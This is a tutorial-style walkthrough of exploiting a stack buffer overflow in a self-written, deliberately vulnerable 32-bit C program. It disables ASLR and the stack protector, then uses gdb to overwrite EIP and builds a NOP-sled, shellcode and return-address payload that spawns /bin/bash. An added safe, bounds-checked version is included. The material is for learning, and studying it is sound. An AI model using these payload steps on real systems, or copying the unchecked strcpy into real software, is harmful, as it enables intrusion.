LINUX EXPLOIT - STACK OVERFLOW
Before we start exploiting the Linux binary, we turn off ASLR by typing the commands shown below:
cat /proc/sys/kernel/randomize_va_space --> shows the current setting (0 means ASLR is off; anything else means it is still active)
echo 0 > /proc/sys/kernel/randomize_va_space --> turns ASLR off (run as root)
cat /proc/sys/kernel/randomize_va_space --> check that it now prints 0
Then we write the vulnerable test program (the post calls it the fuzzer) as follows:
// I am a vulnerable thing.
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
    char buffer[500];
    strcpy(buffer, argv[1]); // Vulnerable function! strcpy never checks the size of buffer
    return 0;
}
Then save it with the .c extension (for example fuzzer.c).
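As an added example that is not part of the original post, here is the same program with the bounds check that strcpy lacks, so that an over-long argument is rejected instead of overwriting the saved return address; the names BUF_SIZE, would_overflow and copy_arg are chosen here.

```c
/* Added example, not from the original post: the same copy into a fixed
 * 500-byte stack buffer, but with the bounds check that strcpy() lacks.
 * Names (BUF_SIZE, would_overflow, copy_arg) are chosen for this example. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 500

/* Returns 1 if an input of srclen bytes cannot fit in a buffer of buflen
 * bytes together with its terminating NUL, i.e. strcpy() would overflow. */
int would_overflow(size_t buflen, size_t srclen)
{
    return srclen >= buflen;
}

/* Safe replacement for strcpy(buffer, src): copies src only if it fits,
 * otherwise leaves buffer untouched. Returns 1 on success, 0 if rejected. */
int copy_arg(char *buffer, size_t buflen, const char *src)
{
    size_t n = strlen(src);
    if (would_overflow(buflen, n))
        return 0;                   /* reject instead of writing past the end */
    memcpy(buffer, src, n + 1);     /* n bytes plus the NUL terminator */
    return 1;
}

int main(int argc, char **argv)
{
    char buffer[BUF_SIZE];

    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (!copy_arg(buffer, sizeof buffer, argv[1])) {
        /* The 505- and 508-byte inputs from the walkthrough end up here
         * instead of overwriting the saved return address. */
        fprintf(stderr, "input too long (%zu bytes, max %d)\n",
                strlen(argv[1]), BUF_SIZE - 1);
        return 1;
    }
    printf("copied %zu bytes\n", strlen(buffer));
    return 0;
}
```

The walkthrough that follows keeps using the unchecked version above.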
After that we compile it with:
gcc -ggdb -o <output name> <source file>
for example:
gcc -ggdb -o coba Desktop/ardy.c
and open the compiled binary in gdb with:
gdb coba
After that, recompile it with the stack protector (SSP) disabled by adding -fno-stack-protector (these flags and the EIP/ESP registers used below assume a 32-bit x86 build):
gcc -ggdb -o coba -fno-stack-protector -mpreferred-stack-boundary=2 Desktop/ardy.c
Then open the result in gdb:
gdb coba
Now we try to overwrite EIP by running the program with a long argument (Python 2 print syntax):
run $(python -c 'print "\x41" * 505')
run $(python -c 'print "\x41" * 508')
info registers eip --> shows whether EIP has been overwritten with 0x41414141
For more detail on the registers that were hit, type:
info registers
and inspect the stack around ESP with:
x/10x $esp - 40
x/10x $esp - 50
break 8 puts a breakpoint on line 8 of the source (in the listing above, the return 0; right after the strcpy).
After that, run the program to the breakpoint and read ESP (the text after run is just the program argument):
run give me esp
info registers esp
run show esp
info registers esp
From the output above we know that ESP is 0xbffff17c; we subtract 200 from it, which gives 0xbffff07c.
To simplify producing the shellcode, the post uses a downloaded shellcode generator (sc_generator). Compile that script, then run it followed by the command you want the shellcode to execute, e.g.:
./sc_generator /bin/bash
Then open gdb again and type the following command (the two placeholders are the generated shellcode and the reduced ESP address from above):
run $(python -c 'print "\x90" * 323 + "<shellcode obtained above>" + "<reduced EIP address>" * 35')
Here 323 bytes of \x90 + 45 bytes of shellcode = 368 bytes.
Of the 508 bytes needed to reach EIP, 508 - 368 = 140 bytes are left,
and 140 / 4 = 35 repetitions of the address.
The 4 comes from \x41\x41\x41\x41: each address that overwrites EIP is 4 bytes.
When you press Enter, you get the result below.